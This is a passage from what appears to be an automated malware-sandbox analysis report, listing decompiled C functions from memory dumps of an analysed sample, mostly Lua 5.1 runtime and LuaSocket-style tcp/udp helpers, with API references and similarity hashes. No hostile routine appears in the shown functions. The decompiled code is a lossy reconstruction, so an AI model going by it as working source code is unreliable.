							asm("repne scasb");
							_t61 =  !(_t59 | 0xffffffff);
							_t104 = 0x100192d8 - _t61;
							_t73 = _t61;
							asm("repne scasb");
							_t64 = _t73 >> 2;
							memcpy(_t106 - 1, _t104, _t64 << 2);
							memcpy(_t104 + _t64 + _t64, _t104, _t73 & 0x00000003);
							_t107 = _t107 + 0x18;
							_t47 = 0;
						}
						_t82 = _t32;
					}
					asm("repne scasb");
					_t49 =  !(_t47 | 0xffffffff);
					_t101 = _t82 - _t49;
					_t72 = _t49;
					asm("repne scasb");
					_t52 = _t72 >> 2;
					memcpy(_t106 - 1, _t101, _t52 << 2);
					return memcpy(_t101 + _t52 + _t52, _t101, _t72 & 0x00000003);
				} else {
					_t105 = _a12;
					_t99 = _a4;
					_t30 = strncpy(_t99,  &(_t31[1]), _t105);
					_t99[_t105 - 1] = 0;
					return _t30;
				}
			}

0x10008dd1
0x10008dd7
0x10008ddc
0x10008dff
0x10008e60
0x10008e6a
0x10008e6d
0x10008e72
0x10008e74
0x10008e74
0x10008e76
0x10008e7a
0x10008e80
0x10008e82
0x10008e84
0x10008e8a
0x10008e8d
0x10008e94
0x10008e98
0x10008e9d
0x10008eb2
0x10008e9f
0x10008ea2
0x10008ea8
0x10008eab
0x10008eab
0x10008eb9
0x10008ebb
0x10008ebf
0x10008ec1
0x10008ec8
0x10008ecd
0x10008ed0
0x10008ed7
0x10008ed7
0x10008ed7
0x10008ed9
0x10008e01
0x10008e05
0x10008e0d
0x10008e10
0x10008e12
0x10008e16
0x10008e1d
0x10008e1e
0x10008e23
0x10008e25
0x10008e2c
0x10008e33
0x10008e35
0x10008e39
0x10008e3b
0x10008e42
0x10008e47
0x10008e4a
0x10008e51
0x10008e51
0x10008e51
0x10008e51
0x10008e53
0x10008e53
0x10008ee3
0x10008ee5
0x10008ee9
0x10008eeb
0x10008ef2
0x10008ef7
0x10008efa
0x10008f07
0x10008dde
0x10008dde
0x10008de2
0x10008dea
0x10008df3
0x10008dfc
0x10008dfc

APIs

strncpy.MSVCRT ref: 10008DEA

Strings

..., xrefs: 10008E27, 10008EAB
[string ", xrefs: 10008E7A

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: strncpy
String ID: ...$[string "
API String ID: 3301158039-3942789791
Opcode ID: 294f9360eaa8d470c85cdf5112ff809418cc79305b088d3b56a4f436ae7870df
Instruction ID: f25712540d7e9a0213640851d85c767ea50d68d6f51b6a8a51168d64045b30b8
Opcode Fuzzy Hash: 294f9360eaa8d470c85cdf5112ff809418cc79305b088d3b56a4f436ae7870df
Instruction Fuzzy Hash: 5D3110366005585B97088A3C9CA442B7BD2FFC52B1769832EF96B873D5CE72CD0A8354

Uniqueness

Uniqueness Score: -1.00%

Function 1000CDE0, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 128
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000CDE0(void* __fp0) {
				intOrPtr _t34;
				intOrPtr _t38;
				signed int _t39;
				void* _t40;
				signed int _t41;
				signed int _t44;
				signed int _t49;
				intOrPtr _t57;
				signed int _t58;
				signed int _t59;
				void* _t61;
				signed int _t62;
				signed int _t63;
				void* _t64;
				void* _t65;
				void* _t66;
				void* _t67;
				void* _t68;
				void* _t69;

				_t45 =  *((intOrPtr*)(_t64 + 8));
				_t58 = E1000CCF0( *((intOrPtr*)(_t64 + 8)));
				_t65 = _t64 + 4;
				_t2 = _t58 + 1; // 0x1
				if(_t2 > 0xfffffff) {
					_t34 = E100088B0( *_t45);
					_t66 = _t65 + 4;
				} else {
					_t34 = E100088D0( *_t45, 0, 0, _t58 << 4);
					_t66 = _t65 + 0x10;
				}
				_t57 =  *((intOrPtr*)(_t66 + 0x18));
				_t62 = 0;
				 *((intOrPtr*)(_t57 + 8)) = _t34;
				 *(_t57 + 0x28) = _t58;
				if(_t58 > 0) {
					_t40 = 0;
					_t49 = _t58;
					do {
						_t40 = _t40 + 0x10;
						_t49 = _t49 - 1;
						 *((intOrPtr*)(_t40 +  *((intOrPtr*)(_t57 + 8)) - 8)) = 0;
					} while (_t49 != 0);
					if(_t58 > 0) {
						 *(_t66 + 0x14) = _t58;
						do {
							_t61 = _t62 +  *((intOrPtr*)(_t57 + 8));
							_t41 = E1000CCA0(_t45);
							_t69 = _t66 + 4;
							if(_t41 > 4) {
								L14:
								E1000CC70(_t45, "bad constant");
								_t66 = _t69 + 8;
							} else {
								switch( *((intOrPtr*)(_t41 * 4 +  &M1000CF48))) {
									case 0:
										 *((intOrPtr*)(_t61 + 8)) = 0;
										goto L15;
									case 1:
										 *__esi = E1000CCA0(__ebx);
										 *((intOrPtr*)(__esi + 8)) = 1;
										goto L15;
									case 2:
										goto L14;
									case 3:
										__eax = E1000CF60(__ebx);
										 *__esi = __fp0;
										 *((intOrPtr*)(__esi + 8)) = 3;
										goto L15;
									case 4:
										 *__esi = E1000CD30(__ebx);
										 *((intOrPtr*)(__esi + 8)) = 4;
										goto L15;
								}
							}
							L15:
							_t62 = _t62 + 0x10;
							_t44 =  *(_t66 + 0x14) - 1;
							 *(_t66 + 0x14) = _t44;
						} while (_t44 != 0);
					}
				}
				_t59 = E1000CCF0(_t45);
				_t67 = _t66 + 4;
				_t19 = _t59 + 1; // 0x1
				if(_t19 > 0x3fffffff) {
					_t38 = E100088B0( *_t45);
					_t68 = _t67 + 4;
				} else {
					_t38 = E100088D0( *_t45, 0, 0, _t59 * 4);
					_t68 = _t67 + 0x10;
				}
				 *((intOrPtr*)(_t57 + 0x10)) = _t38;
				_t39 = 0;
				 *(_t57 + 0x34) = _t59;
				if(_t59 > 0) {
					do {
						_t39 = _t39 + 1;
						 *((intOrPtr*)( *((intOrPtr*)(_t57 + 0x10)) + _t39 * 4 - 4)) = 0;
					} while (_t39 < _t59);
				}
				_t63 = 0;
				_t80 = _t59;
				if(_t59 > 0) {
					do {
						_t39 = E1000CBA0(_t80, _t45,  *((intOrPtr*)(_t57 + 0x20)));
						_t68 = _t68 + 8;
						 *( *((intOrPtr*)(_t57 + 0x10)) + _t63 * 4) = _t39;
						_t63 = _t63 + 1;
					} while (_t63 < _t59);
				}
				return _t39;
			}

0x1000cde1
0x1000cdee
0x1000cdf0
0x1000cdf3
0x1000cdfb
0x1000ce17
0x1000ce1c
0x1000cdfd
0x1000ce0a
0x1000ce0f
0x1000ce0f
0x1000ce1f
0x1000ce23
0x1000ce27
0x1000ce2a
0x1000ce2d
0x1000ce33
0x1000ce35
0x1000ce37
0x1000ce3a
0x1000ce3d
0x1000ce3e
0x1000ce3e
0x1000ce46
0x1000ce4c
0x1000ce50
0x1000ce56
0x1000ce58
0x1000ce5d
0x1000ce63
0x1000ceb1
0x1000ceb7
0x1000cebc
0x1000ce65
0x1000ce65
0x00000000
0x1000ce6c
0x00000000
0x00000000
0x1000ce7e
0x1000ce80
0x00000000
0x00000000
0x00000000
0x00000000
0x1000ce8a
0x1000ce8f
0x1000ce94
0x00000000
0x00000000
0x1000cea6
0x1000cea8
0x00000000
0x00000000
0x1000ce65
0x1000cebf
0x1000cec3
0x1000cec6
0x1000cec7
0x1000cec7
0x1000ce50
0x1000ce46
0x1000ced3
0x1000ced5
0x1000ced8
0x1000cee0
0x1000cefe
0x1000cf03
0x1000cee2
0x1000cef1
0x1000cef6
0x1000cef6
0x1000cf06
0x1000cf09
0x1000cf0d
0x1000cf10
0x1000cf12
0x1000cf15
0x1000cf18
0x1000cf18
0x1000cf12
0x1000cf22
0x1000cf24
0x1000cf26
0x1000cf28
0x1000cf2d
0x1000cf35
0x1000cf38
0x1000cf3b
0x1000cf3c
0x1000cf28
0x1000cf44

APIs

luaM_realloc_.LUA5.1(?,00000000,00000000,00000000,?), ref: 1000CE0A
luaM_toobig.LUA5.1(00000001,?), ref: 1000CE17
luaM_realloc_.LUA5.1(?,00000000,00000000,?,?,?,?), ref: 1000CEF1
luaM_toobig.LUA5.1(00000001,?,?,?), ref: 1000CEFE

Strings

bad constant, xrefs: 1000CEB1

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: M_realloc_.M_toobig.
String ID: bad constant
API String ID: 1500966413-3662893336
Opcode ID: 8b7760b9fe3845ffddfaa9a03bd4c0479c81182749d7fd31bf4cd5b61a15518c
Instruction ID: 6cb43979df2f3fc53998aafd48c48e5cd25b5493bfa0d5b01404fcadb7497039
Opcode Fuzzy Hash: 8b7760b9fe3845ffddfaa9a03bd4c0479c81182749d7fd31bf4cd5b61a15518c
Instruction Fuzzy Hash: EB4124F490074A9BF320DF24DC81F1B72A8EB406D4F10492DF89A9728AE731F95087D2

Uniqueness

Uniqueness Score: -1.00%

Function 00991C50, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 74
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E00991C50(void* __ebx, void* __eflags, void* __fp0, char _a4) {
				intOrPtr* _t11;
				char _t26;
				intOrPtr* _t30;

				_t40 = __fp0;
				_t26 = _a4;
				_t2 = E00991200(_t26, "tcp{server}", 1) + 0x2038; // 0x2038
				_push(E00992DC0(__fp0, _t2));
				_t11 = E00994370(_t8,  &_a4, 0, 0);
				_t29 = _t11;
				if(_t11 != 0) {
					_push(_t26);
					L00994B4E();
					_push(E00994710(_t29));
					_push(_t26);
					L00994AD0();
					return 2;
				} else {
					_push(0x2050);
					_push(_t26);
					L00994B6C();
					_t30 = _t11;
					E009912A0(_t26, "tcp{client}", 0xffffffff);
					E00994660( &_a4);
					_t6 = _t30 + 4; // 0x4
					 *_t30 = _a4;
					E009927D0(_t6, E00994410, E00994520, 0x9947c0, _t30);
					_push(0xbff00000);
					_t7 = _t30 + 0x2038; // 0x2038
					E00992CE0(_t7, 0, 0xbff00000, 0);
					E00992150(_t40, _t30 + 0x18, _t6, _t7);
					return 1;
				}
			}

0x00991c50
0x00991c52
0x00991c65
0x00991c71
0x00991c7c
0x00991c81
0x00991c88
0x00991d02
0x00991d03
0x00991d0e
0x00991d0f
0x00991d10
0x00991d1f
0x00991c8a
0x00991c8b
0x00991c90
0x00991c91
0x00991c9e
0x00991ca0
0x00991caa
0x00991cb9
0x00991cc7
0x00991cc9
0x00991cce
0x00991cd5
0x00991ce3
0x00991cf1
0x00991d01
0x00991d01

APIs

Part of subcall function 00991200: sprintf.MSVCRT ref: 0099122F
Part of subcall function 00991200: luaL_argerror.LUA5.1(?,?,?), ref: 0099123C

lua_newuserdata.LUA5.1(?,00002050), ref: 00991C91

Part of subcall function 009912A0: lua_getfield.LUA5.1(?,FFFFD8F0,?), ref: 009912B0
Part of subcall function 009912A0: lua_setmetatable.LUA5.1(?,?), ref: 009912C3

Part of subcall function 00994660: ioctlsocket.WSOCK32(?,8004667E,00000000), ref: 0099467A

lua_pushnil.LUA5.1(?), ref: 00991D03
lua_pushstring.LUA5.1(?,00000000,00000000,?), ref: 00991D10

Strings

tcp{client}, xrefs: 00991C98
tcp{server}, xrefs: 00991C58

Memory Dump Source

Source File: 00000003.00000002.486716165.0000000000991000.00000020.00020000.sdmp, Offset: 00990000, based on PE: true

Associated: 00000003.00000002.486684810.0000000000990000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486748403.0000000000995000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486779033.0000000000996000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.486820104.0000000000997000.00000002.00020000.sdmp Download File

Similarity

API ID: L_argerror.ioctlsocketlua_getfield.lua_newuserdata.lua_pushnil.lua_pushstring.lua_setmetatable.sprintf
String ID: tcp{client}$tcp{server}
API String ID: 3293237012-1113314389
Opcode ID: acd592a226d023ff14a689fe5dc7f2b4268c6410723ba4345128b0fb6abb7b31
Instruction ID: 26b93de116b2fe53b1b0de9e3dabfff4151264f32cde7ed8b938b69ecbe6cb4f
Opcode Fuzzy Hash: acd592a226d023ff14a689fe5dc7f2b4268c6410723ba4345128b0fb6abb7b31
Instruction Fuzzy Hash: FC110A7254531036DA21737C6C43FAF62AC8FD5B68F000518F504B71C3D665AD4382F9

Uniqueness

Uniqueness Score: -1.00%

Function 1000F260, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 35%

			E1000F260(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				void* __ebx;
				void* __esi;
				intOrPtr _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr _t18;
				intOrPtr* _t21;
				intOrPtr* _t22;
				intOrPtr _t24;
				intOrPtr _t25;
				intOrPtr* _t26;
				intOrPtr* _t28;
				intOrPtr* _t29;

				_t12 = _a12;
				_push(0);
				_t33 = _t12;
				if(_t12 == 0) {
					_t27 = _a4;
					_push(_a8);
					_push(_a4);
					_t13 = E1000F4A0(__eflags);
				} else {
					_t27 = _a4;
					_push(_t12);
					_push(_a8);
					_push(_a4);
					_t13 = E1000F4E0(__ecx, _t33);
				}
				_t22 = _a16;
				_t29 = _t13;
				_t14 = 0;
				_t21 =  *_t22;
				if(_t21 == 0) {
					L15:
					return E1000F090(_t18, _t27, _t40, _t27, _a8, E100019F0(_t27, "invalid option \'%s\'", _t29));
				}
				_t26 = _t22;
				do {
					_t28 = _t29;
					while(1) {
						_t18 =  *_t21;
						_t24 = _t18;
						if(_t18 !=  *_t28) {
							break;
						}
						if(_t24 == 0) {
							L10:
							_t21 = 0;
						} else {
							_t18 =  *((intOrPtr*)(_t21 + 1));
							_t25 = _t18;
							if(_t18 !=  *((intOrPtr*)(_t28 + 1))) {
								break;
							} else {
								_t21 = _t21 + 2;
								_t28 = _t28 + 2;
								if(_t25 != 0) {
									continue;
								} else {
									goto L10;
								}
							}
						}
						L12:
						if(_t21 != 0) {
							goto L13;
						}
						return _t14;
					}
					asm("sbb ecx, ecx");
					asm("sbb ecx, 0xffffffff");
					goto L12;
					L13:
					_t21 =  *((intOrPtr*)(_t26 + 4));
					_t26 = _t26 + 4;
					_t14 = _t14 + 1;
					_t40 = _t21;
				} while (_t21 != 0);
				_t27 = _a4;
				goto L15;
			}

0x1000f260
0x1000f268
0x1000f26a
0x1000f26c
0x1000f287
0x1000f28b
0x1000f28c
0x1000f28d
0x1000f26e
0x1000f26e
0x1000f272
0x1000f277
0x1000f278
0x1000f279
0x1000f27e
0x1000f295
0x1000f299
0x1000f29b
0x1000f29d
0x1000f2a1
0x1000f2e3
0x00000000
0x1000f2fb
0x1000f2a3
0x1000f2a5
0x1000f2a5
0x1000f2a7
0x1000f2a7
0x1000f2a9
0x1000f2ad
0x00000000
0x00000000
0x1000f2b1
0x1000f2c7
0x1000f2c7
0x1000f2b3
0x1000f2b3
0x1000f2b6
0x1000f2bb
0x00000000
0x1000f2bd
0x1000f2bd
0x1000f2c0
0x1000f2c5
0x00000000
0x00000000
0x00000000
0x00000000
0x1000f2c5
0x1000f2bb
0x1000f2d0
0x1000f2d2
0x00000000
0x00000000
0x1000f302
0x1000f302
0x1000f2cb
0x1000f2cd
0x00000000
0x1000f2d4
0x1000f2d4
0x1000f2d7
0x1000f2da
0x1000f2db
0x1000f2db
0x1000f2df
0x00000000

APIs

luaL_optlstring.LUA5.1(?,?,?,00000000), ref: 1000F279

Part of subcall function 1000F4E0: lua_type.LUA5.1(?,?,?,?,1000F27E,?,?,?,00000000), ref: 1000F4EC

luaL_checklstring.LUA5.1(?,?,00000000), ref: 1000F28D
lua_pushfstring.LUA5.1(?,invalid option '%s',00000000), ref: 1000F2EA
luaL_argerror.LUA5.1(?,?,00000000,?,invalid option '%s',00000000), ref: 1000F2F6

Strings

invalid option '%s', xrefs: 1000F2E4

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: L_argerror.L_checklstring.L_optlstring.lua_pushfstring.lua_type.
String ID: invalid option '%s'
API String ID: 2385555857-1300740539
Opcode ID: cb907abaa636c6781e8aa6eedbfe5edc0f7c855e6b1a4d0a2f37be797e5c6cb9
Instruction ID: e3b858a0a18c552b09e056aabe7f9d64cb8fa4d24156ac953f1d4731c024262a
Opcode Fuzzy Hash: cb907abaa636c6781e8aa6eedbfe5edc0f7c855e6b1a4d0a2f37be797e5c6cb9
Instruction Fuzzy Hash: 94112B7EA091422BF704CD648851A7B77DAEFC61D4F1A015CFD8587606D622EC0593D2

Uniqueness

Uniqueness Score: -1.00%

Function 00993880, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 64
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E00993880(void* __eflags, long long __fp0, char _a4) {
				intOrPtr _v4;
				intOrPtr _v8;
				char _v12;
				void* _t13;
				void* _t18;
				char _t23;
				void* _t26;

				_t23 = _a4;
				_t21 = E00991200(_t23, "udp{connected}", 1);
				_push( &_v12);
				_push(2);
				_push(_t23);
				_t3 = _t21 + 8; // 0x8
				_t18 = _t3;
				_a4 = 0;
				L00994B54();
				E00992DC0(__fp0, _t18);
				_push(_t18);
				_t13 = E00994410(_t10,  &_v12, _v12,  &_a4);
				_t22 = _t13;
				_t26 =  &_v12 + 0x30;
				if(_t13 == 0) {
					_v4 = 0;
					_v8 = _a4;
					asm("fild qword [esp+0x1c]");
					 *((long long*)(_t26 - 8)) = __fp0;
					_push(_t23);
					L00994B5A();
					return 1;
				} else {
					_push(_t23);
					L00994B4E();
					_push(E00993860(_t22));
					_push(_t23);
					L00994AD0();
					return 2;
				}
			}

0x00993886
0x00993898
0x0099389e
0x0099389f
0x009938a1
0x009938a2
0x009938a2
0x009938a5
0x009938ad
0x009938b5
0x009938c2
0x009938c7
0x009938cc
0x009938ce
0x009938d3
0x009938fc
0x00993904
0x0099390b
0x0099390f
0x00993912
0x00993913
0x00993927
0x009938d5
0x009938d5
0x009938d6
0x009938e1
0x009938e2
0x009938e3
0x009938f7
0x009938f7

APIs

Part of subcall function 00991200: sprintf.MSVCRT ref: 0099122F
Part of subcall function 00991200: luaL_argerror.LUA5.1(?,?,?), ref: 0099123C

luaL_checklstring.LUA5.1 ref: 009938AD
lua_pushnil.LUA5.1(?,?,?,?,?,?,?,udp{connected},00000001), ref: 009938D6
lua_pushstring.LUA5.1(?,00000000,00000000,?,?,?,?,?,?,?,udp{connected},00000001), ref: 009938E3
lua_pushnumber.LUA5.1(?,?,?,?,?,?,?,?,?,udp{connected},00000001), ref: 00993913

Strings

udp{connected}, xrefs: 0099388D

Memory Dump Source

Source File: 00000003.00000002.486716165.0000000000991000.00000020.00020000.sdmp, Offset: 00990000, based on PE: true

Associated: 00000003.00000002.486684810.0000000000990000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486748403.0000000000995000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486779033.0000000000996000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.486820104.0000000000997000.00000002.00020000.sdmp Download File

Similarity

API ID: L_argerror.L_checklstring.lua_pushnil.lua_pushnumber.lua_pushstring.sprintf
String ID: udp{connected}
API String ID: 3330160982-744045061
Opcode ID: 6e80b69b767892937dac14f9976363467dea1a43f8274a8fe0f5409d4aa3fbb3
Instruction ID: ccad21811a6e49bb2c7bc9874ce0eafb836c9210494f8eb91088e318915de40d
Opcode Fuzzy Hash: 6e80b69b767892937dac14f9976363467dea1a43f8274a8fe0f5409d4aa3fbb3
Instruction Fuzzy Hash: CC01C8725042047BD601BB58EC82FAFB7ACEFC5359F404529F95493241EA7A9A1F42F3

Uniqueness

Uniqueness Score: -1.00%

Function 00992E40, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 39%

			E00992E40(char* __eax, long long __fp0, intOrPtr _a4, long long* _a8) {
				long long _v8;
				void* _t10;
				void* _t12;
				intOrPtr _t16;
				void* _t18;

				_t16 = _a4;
				_push(0xbff00000);
				_push(0);
				_push(2);
				_push(_t16);
				L00994B72();
				_v8 = __fp0;
				_push(0);
				_push("b");
				_push(3);
				_push(_t16);
				L00994B78();
				_t18 =  &_v8 + 0x20;
				_t10 =  *__eax - 0x62;
				if(_t10 == 0) {
					 *_a8 = _v8;
				} else {
					_t12 = _t10 - 0x10;
					if(_t12 == 0 || _t12 == 2) {
						 *((long long*)(_a8 + 8)) = _v8;
					} else {
						_push("invalid timeout mode");
						_push(3);
						_push(_t16);
						L00994B2A();
						_t18 = _t18 + 0xc;
					}
				}
				_push(0x3ff00000);
				_push(0);
				_push(_t16);
				L00994B5A();
				return 1;
			}

0x00992e44
0x00992e48
0x00992e4d
0x00992e4f
0x00992e51
0x00992e52
0x00992e57
0x00992e5b
0x00992e5d
0x00992e62
0x00992e64
0x00992e65
0x00992e6d
0x00992e70
0x00992e73
0x00992ea6
0x00992e75
0x00992e75
0x00992e78
0x00992e99
0x00992e7f
0x00992e7f
0x00992e84
0x00992e86
0x00992e87
0x00992e8c
0x00992e8c
0x00992e78
0x00992ea8
0x00992ead
0x00992eaf
0x00992eb0
0x00992ec1

APIs

luaL_optnumber.LUA5.1(?,00000002,00000000,BFF00000,?), ref: 00992E52
luaL_optlstring.LUA5.1(?,00000003,009964E0,00000000,?,00000002,00000000,BFF00000,?), ref: 00992E65
luaL_argerror.LUA5.1(?,00000003,invalid timeout mode,?,?,?,?,?,?,?,?), ref: 00992E87
lua_pushnumber.LUA5.1(?,00000000,3FF00000,?,?,?,?,?,?,?,?), ref: 00992EB0

Strings

invalid timeout mode, xrefs: 00992E7F

Memory Dump Source

Source File: 00000003.00000002.486716165.0000000000991000.00000020.00020000.sdmp, Offset: 00990000, based on PE: true

Associated: 00000003.00000002.486684810.0000000000990000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486748403.0000000000995000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486779033.0000000000996000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.486820104.0000000000997000.00000002.00020000.sdmp Download File

Similarity

API ID: L_argerror.L_optlstring.L_optnumber.lua_pushnumber.
String ID: invalid timeout mode
API String ID: 625380743-4138997160
Opcode ID: 76895dfbddc876877b72ce3a36d14e5546f380fd9c0f644927ce912745164ead
Instruction ID: f140128539b85719f233e88198b8396d897fe82d7ab11d35aacaa6d128f9ad90
Opcode Fuzzy Hash: 76895dfbddc876877b72ce3a36d14e5546f380fd9c0f644927ce912745164ead
Instruction Fuzzy Hash: 72F0C83114460172DB26AF6CAD87F5E3B985FC9B01F540844F9C43A1D0D665AE2982AB

Uniqueness

Uniqueness Score: -1.00%

Function 1000F1C0, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E1000F1C0(void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				char _v64;
				intOrPtr _v80;
				char _v100;
				void* _t7;
				intOrPtr _t10;
				void* _t16;
				void* _t17;

				_t16 =  &_v100;
				_t15 = _a4;
				_t7 = E10003F40(_a4, _a8, _t16);
				_t17 = _t16 + 0xc;
				if(_t7 == 0) {
					L3:
					return E10001930(_t15, 0x1001ab10, 0);
				} else {
					E10004130(_t15, "Sl",  &_v100);
					_t10 = _v80;
					_t17 = _t17 + 0xc;
					if(_t10 <= 0) {
						goto L3;
					} else {
						_push(_t10);
						return E100019F0(_t15, "%s:%d: ",  &_v64);
					}
				}
			}

0x1000f1c4
0x1000f1cc
0x1000f1d3
0x1000f1d8
0x1000f1dd
0x1000f213
0x1000f227
0x1000f1df
0x1000f1ea
0x1000f1ef
0x1000f1f3
0x1000f1f8
0x00000000
0x1000f1fa
0x1000f1fa
0x1000f212
0x1000f212
0x1000f1f8

APIs

lua_getstack.LUA5.1(?,?,?,?), ref: 1000F1D3
lua_getinfo.LUA5.1(?,10019AE8,?,?,?,?), ref: 1000F1EA

Part of subcall function 10004130: strchr.MSVCRT ref: 1000417D
Part of subcall function 10004130: luaD_growstack.LUA5.1(?,00000001), ref: 100041B2
Part of subcall function 10004130: strchr.MSVCRT ref: 100041C1

lua_pushfstring.LUA5.1(?,%s:%d: ,?,?,?,?,?,?,?,?), ref: 1000F206
lua_pushlstring.LUA5.1(?,1001AB10,00000000,?,?,?), ref: 1000F21B

Strings

%s:%d: , xrefs: 1000F200

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: strchr$D_growstack.lua_getinfo.lua_getstack.lua_pushfstring.lua_pushlstring.
String ID: %s:%d:
API String ID: 482154976-2688275532
Opcode ID: 98809ac28d3a6b7578631f77cddceed1af574037984dbc11690e4aa25e6fdf89
Instruction ID: c9e2aba0d979d5a9bedc80e69ae400b0c98800beffabe599b207f6c5ef9aa643
Opcode Fuzzy Hash: 98809ac28d3a6b7578631f77cddceed1af574037984dbc11690e4aa25e6fdf89
Instruction Fuzzy Hash: DBF082BA9042103BE200D618AC52EEB73DDEF94184F844929FD489610BF721FB5987EB

Uniqueness

Uniqueness Score: -1.00%

Function 009937E0, Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E009937E0(intOrPtr _a4) {
				intOrPtr _t9;

				_t9 = _a4;
				E00991010(_t9, "udp{connected}", 0x9965c8);
				E00991010(_t9, "udp{unconnected}", 0x9965c8);
				E00991180(_t9, "udp{connected}", "udp{any}");
				E00991180(_t9, "udp{unconnected}", "udp{any}");
				E00991180(_t9, "udp{connected}", "select{able}");
				E00991180(_t9, "udp{unconnected}", "select{able}");
				_push(0);
				_push(0x996690);
				_push(0);
				_push(_t9);
				L00994B48();
				return 0;
			}

0x009937e1
0x009937f0
0x00993800
0x00993810
0x00993820
0x00993830
0x00993840
0x00993848
0x0099384a
0x0099384f
0x00993851
0x00993852
0x0099385d

APIs

Part of subcall function 00991010: luaL_newmetatable.LUA5.1(?,?), ref: 0099101C
Part of subcall function 00991010: lua_pushstring.LUA5.1(?,__index,?,?), ref: 00991027
Part of subcall function 00991010: lua_createtable.LUA5.1(?,00000000,00000000,?,__index,?,?), ref: 00991031
Part of subcall function 00991010: lua_pushstring.LUA5.1(?,class,?,00000000,00000000,?,__index,?,?), ref: 0099103C
Part of subcall function 00991010: lua_pushstring.LUA5.1(?,?,?,class,?,00000000,00000000,?,__index,?,?), ref: 00991043
Part of subcall function 00991010: lua_rawset.LUA5.1(?,000000FD,?,?,?,class,?,00000000,00000000,?,__index,?,?), ref: 0099104B
Part of subcall function 00991010: lua_pushstring.LUA5.1(?,00000000), ref: 0099105F
Part of subcall function 00991010: lua_pushcclosure.LUA5.1(?,?,00000000,?,00000000), ref: 0099106B
Part of subcall function 00991010: lua_rawset.LUA5.1(?,?,?,?,00000000,?,00000000), ref: 00991083
Part of subcall function 00991010: lua_rawset.LUA5.1(?,000000FD), ref: 00991098
Part of subcall function 00991010: lua_settop.LUA5.1(?,000000FE,?,000000FD), ref: 009910A0

Part of subcall function 00991180: lua_getfield.LUA5.1(?,FFFFD8F0,?), ref: 00991190
Part of subcall function 00991180: lua_pushstring.LUA5.1(?,?,?,FFFFD8F0,?), ref: 0099119B
Part of subcall function 00991180: lua_pushboolean.LUA5.1(?,00000001,?,?,?,FFFFD8F0,?), ref: 009911A3
Part of subcall function 00991180: lua_rawset.LUA5.1(?,000000FD,?,00000001,?,?,?,FFFFD8F0,?), ref: 009911AB
Part of subcall function 00991180: lua_settop.LUA5.1(?,000000FE,?,000000FD,?,00000001,?,?,?,FFFFD8F0,?), ref: 009911B3

luaL_openlib.LUA5.1(?,00000000,00996690,00000000), ref: 00993852

Strings

udp{connected}, xrefs: 009937EA, 0099380A, 0099382A
udp{any}, xrefs: 00993805, 00993815
udp{unconnected}, xrefs: 009937FA, 0099381A, 0099383A
select{able}, xrefs: 00993825, 00993835

Memory Dump Source

Source File: 00000003.00000002.486716165.0000000000991000.00000020.00020000.sdmp, Offset: 00990000, based on PE: true

Associated: 00000003.00000002.486684810.0000000000990000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486748403.0000000000995000.00000002.00020000.sdmp Download File
